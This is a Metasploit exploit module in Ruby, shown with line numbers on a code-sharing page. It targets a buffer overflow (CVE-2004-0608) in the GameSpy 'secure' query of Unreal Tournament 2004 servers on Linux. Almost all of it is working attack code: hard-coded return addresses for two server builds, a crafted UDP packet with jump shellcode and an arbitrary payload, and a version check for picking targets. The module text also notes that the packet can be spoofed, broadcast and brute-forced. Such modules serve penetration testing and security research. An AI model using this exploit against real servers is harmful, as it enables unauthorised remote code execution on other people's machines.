Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::Udp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Unreal Tournament 2004 "secure" Overflow (Linux)',
14
      'Description'    => %q{
15
          This is an exploit for the GameSpy secure query in
16
        the Unreal Engine.
17

18
        This exploit only requires one UDP packet, which can
19
        be both spoofed and sent to a broadcast address.
20
        Usually, the GameSpy query server listens on port 7787,
21
        but you can manually specify the port as well.
22

23
        The RunServer.sh script will automatically restart the
24
        server upon a crash, giving us the ability to
25
        bruteforce the service and exploit it multiple
26
        times.
27
      },
28
      'Author'         => [ 'onetwo' ],
29
      'License'        => BSD_LICENSE,
30
      'References'     =>
31
        [
32
          [ 'CVE', '2004-0608'],
33
          [ 'OSVDB', '7217'],
34
          [ 'BID', '10570'],
35

36
        ],
37
      'Privileged'     => true,
38
      'Payload'        =>
39
        {
40
          'Space'    => 512,
41
          'BadChars' => "\x5c\x00",
42

43
        },
44
      'Platform'       => 'linux',
45
      'Targets'        =>
46
        [
47
          ['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer
48
          ['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }],
49
        ],
50
      'DisclosureDate' => '2004-06-18'))
51

52
    register_options(
53
      [
54
        Opt::RPORT(7787)
55
      ])
56
  end
57

58
  def exploit
59
    connect_udp
60

61
    buf = make_nops(1024)
62
    buf[24, 4] = [target['Rets'][1]].pack('V')
63
    buf[44, 4] = [target['Rets'][0]].pack('V')
64
    buf[56, 4] = [target['Rets'][1]].pack('V')
65
    buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP
66

67
    buf[0,  8] = "\\secure\\"
68
    buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded
69

70
    udp_sock.put(buf)
71

72
    handler
73
    disconnect_udp
74
  end
75

76
  def ut_version
77
    connect_udp
78
    udp_sock.put("\\basic\\")
79
    res = udp_sock.recvfrom(8192)
80
    disconnect_udp
81

82
    if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/)))
83
      return m[1]
84
    end
85

86
    return
87
  end
88

89
  def check
90
    vers = ut_version
91

92
    if (not vers)
93
      vprint_status("Could not detect Unreal Tournament Server")
94
      return Exploit::CheckCode::Unknown
95
    end
96

97
    print_status("Detected Unreal Tournament Server Version: #{vers}")
98
    if (vers =~ /^(3120|3186|3204)$/)
99
      vprint_status("This system appears to be exploitable")
100
      return Exploit::CheckCode::Appears
101
    end
102

103

104
    if (vers =~ /^(2...)$/)
105
      vprint_status("This system appears to be running UT2003")
106
      return Exploit::CheckCode::Detected
107
    end
108

109
    vprint_status("This system appears to be patched")
110
    return Exploit::CheckCode::Safe
111
  end
112
end
113

114